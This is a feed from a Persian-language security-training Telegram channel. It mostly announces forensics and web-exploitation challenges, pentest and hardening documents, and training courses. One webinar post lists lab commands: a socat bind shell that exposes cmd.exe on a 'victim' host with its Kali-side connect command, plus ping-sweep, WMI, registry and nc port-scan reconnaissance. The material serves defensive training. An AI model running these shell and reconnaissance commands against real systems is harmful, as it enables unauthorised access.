securityworld
4.05K subscribers
1.05K photos
14 videos
53 files
1.08K links
آموزش امنیت و تست نفوذ
https://securityworld.ir

@ENITP
Download Telegram
Forwarded from challenginno.ir
✔️ یک تحلیل‌گر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش داده‌اند که فعالیت‌های غیرعادی مشاهده کرده‌اند، اما هیچ برنامه‌ای به طور واضح در حال اجرا نیست.


شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.


وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/memory-forensic
PowerShell for Pentest-Final.pdf
2.7 MB
پاورشل به عنوان یک ابزار قدرتمند در سیستم‌عامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده می‌شود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.

📌 در این کتاب، به بررسی روش‌های مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمع‌آوری اطلاعات گرفته تا بهره‌برداری و Post-Exploitation، تکنیک‌هایی معرفی خواهند شد که به کارشناسان امنیت کمک می‌کنند تا نقاط ضعف شبکه‌ها و سیستم‌ها را شناسایی کرده و برای بهبود امنیت اقدام کنند.

🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخش‌هایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.

فیلم وبینار هم اکنون در دسترس دوستان می باشد.


🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید

🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time

`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
Forwarded from challenginno.ir
✔️ آسیب‌پذیری SQL Injection یکی از رایج‌ترین و خطرناک‌ترین نقاط ضعف امنیتی در برنامه‌های تحت وب است. این آسیب پذیری زمانی رخ می‌دهد که ورودی‌های کاربر به‌درستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئری‌های SQL استفاده شوند.


در این چالش سعی شده است که به آسیب‌پذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.


این جالش شامل دو مرحله اکسپلویت آسیب‌پذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/no-sqli-njection
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.


تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.


هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.


🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/incident-response-6
Forwarded from challenginno.ir
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.


تیم امنیتی متوجه شده که برخی از حساب‌های کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانه‌ای از بدافزار یا ابزارهای شناخته‌شده نفوذ وجود ندارد.


وظیفه‌ی شما این است که ردپای مهاجم را پیدا کنید، نحوه‌ی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/windows-forensic/
Forwarded from challenginno.ir
✔️ یک شرکت امنیتی متوجه می‌شود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایل‌های حساس را از سیستم خود پاک کرده است.


تیم امنیتی باید مشخص کند که آیا فایل‌های حذف شده بازیابی‌پذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانه‌ای از مخفی‌سازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیک‌ها وجود دارد.


برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/for500
Forwarded from TolueAcademy
پلتفرم شکار تهدید HELK – یک راهکار متن‌باز برای تحلیل امنیتی پیشرفته
--------------------------------------
Hunting ELK (HELK) یکی از اولین پلتفرم‌های متن‌باز برای شکار تهدیدات است که دارای قابلیت‌های تحلیل پیشرفته‌ای مانند SQL، گراف‌سازی، استریم داده‌های ساختاریافته، و یادگیری ماشین از طریق Jupyter Notebooks و Apache Spark بر روی ELK Stack می‌باشد. این پروژه ابتدا برای تحقیقات امنیتی توسعه یافت، اما به دلیل طراحی انعطاف‌پذیر و اجزای اصلی آن، قابلیت استقرار در محیط‌های سازمانی بزرگ را نیز دارد.
ویژگی‌های کلیدی HELK
🔹 تحلیل داده‌های امنیتی پیشرفته

پشتیبانی از SQL برای اجرای کوئری‌های پیشرفته

گراف‌سازی و تحلیل بصری داده‌های امنیتی

پردازش استریمینگ داده‌ها برای تحلیل لحظه‌ای

🔹 یکپارچه‌سازی یادگیری ماشین


قابلیت توسعه مدل‌های تشخیص ناهنجاری

🔹 شکار تهدیدات و تحلیل امنیتی

طراحی‌شده برای شناسایی و بررسی رفتارهای مشکوک مهاجمان

پشتیبانی از قوانین Sigma، چارچوب MITRE ATT&CK و زبان EQL

امکان ساخت و تنظیم قوانین امنیتی سفارشی

کسب اطلاعات بیشتر:

https://github.com/Cyb3rWard0g/HELK
Forwarded from challenginno.ir
✔️ قسمت Authorization Testing یکی از بخش‌های کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزم‌های تعیین سطوح دسترسی و Authorization در برنامه‌های وب می‌پردازد.


آسیب‌پذیری Bypassing Authorization Schema زمانی رخ می‌دهد که یک مهاجم بتواند با دور زدن مکانیزم‌های کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.


در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✔️ مستند امن‌سازی IIS 10 بر اساس چارچوب CIS شامل مجموعه‌ای از توصیه‌ها و پیکربندی‌های امنیتی است که به سازمان‌ها کمک می‌کند تا سرور Microsoft IIS 10 خود را در برابر تهدیدات سایبری محافظت کنند.


این راهنما شامل تنظیمات امنیتی پیشنهادی برای سرور وب، مدیریت هویت و دسترسی، لاگینگ و نظارت، و کاهش سطح حمله است.


این مستند به عنوان یک استاندارد امنیتی شناخته‌شده، به مدیران شبکه و امنیت امکان می‌دهد تا IIS 10 را مطابق با بهترین شیوه‌های امنیتی تنظیم و ایمن‌سازی کنند.


🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:

🌐 yun.ir/9otg6d
🧑‍💻 آموزش تست نفوذ را با ما تجربه کنید :
[+]تست نفوذ شبکه و وب را رایگان یاد بگیر .
[+]مهندسی اجتماعی را رایگان یاد بگیر .
[+]زبان C برای هکرها و فراتر از آن !
[+]ابزار نویسی با پایتون را رایگان یاد بگیر .
[+]مفاهیم پایه امنیت را با ما یاد بگیر .
[+]نکات و ابزار ها و کاربا ابزارهای امنیتی و مقاله های امنیت را در کانال ما دنبال کنید .
[+]پیش نیازهای ورود به دنیای تست نفوذ را با ما تجربه کنید .
[+]چگونه و از کجا هک را شروع کنیم ؟قبلاً فیلم هکرهایی را تماشا کرده اید؟
[+] پرینتر هکینگ
[+] اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
[+] مقدمه ای بر امنیت سایبری
[+] مینی‌دوره Linux command-line
[+] دوره Security plus
[+] دوره برنامه نویسی اسمبلی
🔖 و کلی مباحث و مفاهیم دیگر را با ما تجربه کنید .
⭕️ به دنیای آموزش رایگان تست نفوذ خوش اومدید .
♦️ linkedin | YouTube | Instagram |
💠 @TryHackBox
Forwarded from TolueAcademy
آکادمی طلوع برگزار می‌کند: سه دوره آموزشی تخصصی به صورت Crash Course! 🔴
---------------------------------
اگر به دنبال یادگیری مهارت‌های کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دوره‌های فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی Red Teaming – تکنیک‌های پیشرفته نفوذ و شبیه‌سازی حملات واقعی برای دور زدن مکانیزم‌های امنیتی

https://evnd.co/Nt3PK
🎯 ویژگی‌های دوره‌ها:
تدریس توسط متخصصان با تجربه
محتوای کاملاً عملی و کاربردی
ارائه سناریوهای واقعی و تمرینات عملی
امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبت‌نام کنید و مهارت‌های خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
Forwarded from TolueAcademy
آکادمی طلوع برگزار می‌کند: سه دوره آموزشی تخصصی به صورت Crash Course! 🔴
---------------------------------
اگر به دنبال یادگیری مهارت‌های کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دوره‌های فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی FortiGate & Splunk – تسلط بر مدیریت و تنظیمات فایروال FortiGate به همراه مانیتورینگ و تحلیل لاگ‌ها در Splunk

https://evnd.co/PDyNV
🎯 ویژگی‌های دوره‌ها:
تدریس توسط متخصصان با تجربه
محتوای کاملاً عملی و کاربردی
ارائه سناریوهای واقعی و تمرینات عملی
امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبت‌نام کنید و مهارت‌های خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
TolueAcademy
Forwarded from TolueAcademy
آکادمی طلوع برگزار می‌کند: سه دوره آموزشی تخصصی به صورت Crash Course! 🔴
---------------------------------
اگر به دنبال یادگیری مهارت‌های کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دوره‌های فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی FortiWeb – آشنایی کامل با فایروال برنامه‌های تحت وب و پیکربندی امنیتی آن

https://evnd.co/z1LJ7
🎯 ویژگی‌های دوره‌ها:
تدریس توسط متخصصان با تجربه
محتوای کاملاً عملی و کاربردی
ارائه سناریوهای واقعی و تمرینات عملی
امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبت‌نام کنید و مهارت‌های خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
TolueAcademy
✔️ مستند امن‌سازی SQL Server 2019 بر اساس چارچوب CIS شامل مجموعه‌ای از راهنمایی‌های امنیتی استاندارد برای محافظت از پایگاه داده Microsoft SQL Server 2019 در برابر تهدیدات سایبری و سوءاستفاده‌های احتمالی است.


این مستند تنظیمات پیشنهادی در حوزه‌های مدیریت هویت و دسترسی، کنترل‌های احراز هویت، تنظیمات امنیتی دیتابیس، لاگینگ و نظارت، و کاهش سطح حمله را پوشش می‌دهد.


این راهنما یک مرجع مهم برای مدیران پایگاه داده و متخصصان امنیت است تا SQL Server 2019 را مطابق با بهترین شیوه‌های امنیتی و استانداردهای جهانی پیکربندی کنند.


🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:

🌐 yun.ir/jx17a1
Forwarded from challenginno.ir
✔️ یکی از سوالاتی که همیشه در حوزه های مختلف امنیت سایبری به خصوص حوزه های Red Team و SOC مطرح بوده است، نحوه شروع به کار با فریمورک MITRE ATT&CK می باشد.


فریمورک MITRE ATT&CK یک پایگاه دانش جهانی از تاکتیک‌ها و تکنیک‌های مهاجمان بر اساس مشاهدات واقعی است. این پایگاه دانش به عنوان بنیادی برای توسعه مدل‌ها و متدولوژی‌های تهدید در بخش خصوصی، دولت و جامعه محصولات و خدمات امنیت سایبری به کار می‌رود.


در این چالش که به صورت پرسش و پاسخ طراحی شده است، سعی شده تا شما را در پاسخ به این سوال که چگونه استفاده از فریمورک MITRE ATT&CK را آغاز کنیم، راهنمایی کند.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/mitre-attack
Getting Start with MITRE ATTaCK.pdf
2.3 MB
این کتاب با هدف آشنایی شما با MITRE ATT&CK، کاربردهای آن در تحلیل تهدیدات، شناسایی نقاط ضعف، تقویت استراتژی‌های امنیتی و بهبود پاسخگویی به حملات نگارش شده است.


محتوای این کتاب توسط وب سایت MITRE تهیه شده و برگرفته از مقالات Katie Nickels، John Wunder، Blake Strom، Tim Schulz و Andy Applebaum می‌باشد و در آن به نحوه چگونگی شروع استفاده از فریمورک MITRE ATT&CK پرداخته شده است.
Forwarded from TolueAcademy
⛔️👇👇👇👇👇👇👇⛔️
Forwarded from TolueAcademy
استدلال معکوس در امنیت سایبری – درس‌هایی از شرلوک هولمز
----------------------------------------------------------------------
"در حل یک مسئله از این نوع، مهم‌ترین چیز توانایی استدلال معکوس است... بیشتر مردم، اگر یک روند وقایع را برایشان توضیح دهید، می‌توانند نتیجه‌ی نهایی را پیش‌بینی کنند. آن‌ها می‌توانند این وقایع را در ذهن خود کنار هم قرار دهند و نتیجه بگیرند که چه اتفاقی خواهد افتاد. اما افراد بسیار کمی هستند که اگر فقط نتیجه نهایی را بدانند، بتوانند مراحل و وقایعی را که به آن نتیجه منجر شده است، بازسازی کنند. این توانایی همان چیزی است که من هنگام صحبت از استدلال معکوس یا تحلیل‌گرایانه به آن اشاره می‌کنم."
— شرلوک هولمز
مفهوم این اصل در امنیت سایبری
در امنیت سایبری، بسیاری از ابزارها و کارشناسان می‌توانند وقتی یک حمله یا رویداد مشکوک رخ می‌دهد، تأثیرات و پیامدهای آن را شناسایی کنند. اما تحلیل‌گران امنیتی خبره کسانی هستند که می‌توانند از یک نشانه یا رویداد نهایی، مسیر وقوع حمله را بازسازی کنند و بفهمند که حمله از کجا آغاز شده و چه مراحلی طی شده است.
به‌عبارت دیگر، متخصصان امنیتی باید همانند شرلوک هولمز، به‌جای پیش‌بینی حملات، مسیر آن‌ها را از آخر به اول بازسازی کنند. این کار به آن‌ها کمک می‌کند تا نقاط ضعف را کشف کرده و از حملات مشابه در آینده جلوگیری کنند.

کاربردهای عملی استدلال معکوس در امنیت سایبری
تحلیل حملات سایبری
فرض کنید یک سازمان متوجه می‌شود که داده‌هایش به بیرون درز کرده‌اند. روش کلاسیک تحلیل ممکن است روی بررسی تأثیرات حمله تمرکز کند، اما روش استدلال معکوس به ما کمک می‌کند تا بفهمیم:
• نقطه ورود مهاجم به شبکه کجا بوده است؟
• مهاجم از چه آسیب‌پذیری‌هایی استفاده کرده است؟
• چگونه به داده‌های حساس دسترسی پیدا کرده و آن‌ها را خارج کرده است؟
پاسخ به رخدادهای امنیتی
پس از شناسایی یک نفوذ یا رفتار مشکوک، تیم‌های امنیتی باید مسیر حرکت مهاجم را در شبکه به عقب دنبال کنند. این کار شامل بررسی لاگ‌ها، تغییرات در سیستم‌ها، و رفتارهای غیرعادی کاربران است تا متوجه شوند که مهاجم چگونه توانسته به سیستم نفوذ کند.
تحلیل جرایم سایبری و مهندسی معکوس بدافزارها
در جرایم سایبری، محققان امنیتی و تیم‌های واکنش به رخدادها (CSIRT) باید از ردپاهای دیجیتالی استفاده کنند تا مراحل یک حمله را بازسازی کنند. همچنین، در مهندسی معکوس بدافزارها، تحلیل‌گران باید بفهمند که یک کد مخرب چگونه کار می‌کند و چه تغییراتی در سیستم ایجاد کرده است.
@TolueRise